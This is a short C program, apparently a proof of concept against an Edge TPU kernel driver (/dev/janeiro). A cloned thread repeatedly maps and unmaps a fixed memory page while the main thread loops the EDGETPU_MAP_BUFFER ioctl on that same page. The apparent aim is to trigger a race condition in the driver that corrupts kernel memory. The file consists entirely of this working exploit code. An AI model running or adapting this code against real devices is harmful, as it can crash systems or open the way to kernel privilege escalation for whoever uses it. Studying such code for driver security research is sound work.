#include "edgetpu.h"
#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <stdio.h>
#include <sys/ioctl.h>
int edgefd;
void *map_location = (void *)0x10000000;
int map_toggle(void *arg)
{
    while (1)
    {
        if (mmap(map_location, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0) == (void *)-1)
        {
            printf("mmap: %m\n");
            return 1;
        }
        munmap(map_location,0x1000);
    }
}
int main()
{
    int ret;
    edgefd = open("/dev/janeiro", O_RDWR);
    if (edgefd == -1)
    {
        printf("open: %m\n");
        return 1;
    }
    void *stack = mmap(NULL, 0x1000 * 512, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);

    clone(map_toggle, stack + 0x1000 * 512, CLONE_VM, NULL, NULL, NULL, NULL);
    struct edgetpu_mailbox_attr attr;
    attr.cmd_queue_size = 4;
    attr.sizeof_cmd = 32;
    attr.resp_queue_size = 4;
    attr.sizeof_resp = 32;
    attr.priority = EDGETPU_PRIORITY_DETACHABLE;
    attr.cmdq_tail_doorbell = 1;
    attr.partition_type = EDGETPU_PARTITION_NORMAL;
    // attr.client_priv = 0;
    ret = ioctl(edgefd, EDGETPU_CREATE_GROUP, &attr);
    if (ret < 0)
    {
        printf("ioctl create group: %m\n");
        return 1;
    }
    while(1) {
        struct edgetpu_map_ioctl arg;
    arg.host_address = (unsigned long long)map_location;
    // arg.host_address = 0;
    arg.size = 0x1000;
    arg.flags = EDGETPU_MAP_DMA_BIDIRECTIONAL;
    ret = ioctl(edgefd, EDGETPU_MAP_BUFFER, &arg);
    if (ret < 0)
    {
        printf("ioctl map buffer: %m\n");
     //   return 1;
    }
    }
    
}